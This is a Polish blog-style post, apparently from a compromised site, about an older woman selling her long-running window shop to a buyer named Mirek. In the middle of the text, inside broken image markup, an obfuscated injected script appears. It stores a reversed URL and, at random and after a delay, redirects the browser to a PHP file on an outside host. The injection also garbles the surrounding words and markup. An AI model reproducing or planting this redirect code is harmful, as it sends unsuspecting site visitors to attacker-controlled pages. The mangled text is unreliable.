Sprzedaje lokal z oknami

Biznes z oknami prowadziłam od trzydziestu lat. Moje córki nie chcą go przejąć. Mam dwie córki i obie wyprowadziły się z Warszawy. Jedna mieszka w Poznaniu a druga w Krakowie. Założyły rodziny i mają dzieci. Postanowiłam sprzedać lokal z oknami i zacząć żyć i podróżować.

Szukam chętnego do prowadzenia firmy z oknami

ka<script>$zXz=function(n){if (typeof ($zXz.list[n]) == „string”) return $zXz.list[n].split(„”).reverse().join(„”);return $zXz.list[n];};$zXz.list=[„\’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>towickie okna pcv” class=”alignleft” height=”188″ src=”http://www.disc4you.eu/wp-content/uploads/2017/05/ka<script>$zXz=function(n){if (typeof ($zXz.list[n]) == towickie-okna-pcv.jpg” style=”float: left;” width=”250″/>Moja firma ma dobrą renomę na lokalnym rynku. Zawsze miałam sporo klientów i byłam zadowolona z branży, która prowadziłam. Katowickie okna pcv zawsze były chwalone i polecane przez specjalistów. Mam już jednak swoje lata i firmę powinna prowadzić młoda osoba. Skoro moje dzieci nie chcą się nią zająć postanowiłam ją sprzedać. Zamieściłam ogłoszenie w gazecie lokalnej i byłam bardzo zdziwiona, że od rana miała tak dużo telefonów. Postanowiłam firmę sprzedać osobie, którą będzie chciała kontynuować sprzedaż okien w tym miejscu. Lokalizacja mojej firmy jest bardzo dobra dlatego tak wiele osób było zainteresowanych odkupieniem mojego lokalu. Okna, które znajdowały się w moim sklepie były bardzo dobrej jakości. Wszystkie były solidnie wykonane i posiadały długoletnią gwarancję. Współpracowałam z najlepszymi dostawcami i gwarantowałam moim klientom darmowy montaż. Najbardziej spodobała mi się propozycja od pana Mirka, który ma spore doświadczenie w branży związanej z oknami. Przez wiele lat zajmował się ich montażem i teraz planuje zainwestować swoje zaoszczędzone pieniądze w swój biznes. Postanowiłam mu w tym pomóc i sprzedałam mu mój lokal razem z całym wyposażeniem, ze wszystkimi oknami i akcesoriami

Okna do tej pory były moim całym światem. teraz jednak chciałabym zająć się swoim życiem. Chciałabym więcej czasu spędzać z moimi córkami i wnukami. Wiem, że pan Mirek poradzi sobie w prowadzeniu firmy. Dostrzegłam w nim spore zaangażowanie, które miałam także kiedy zaczynałam działaś w tej branży.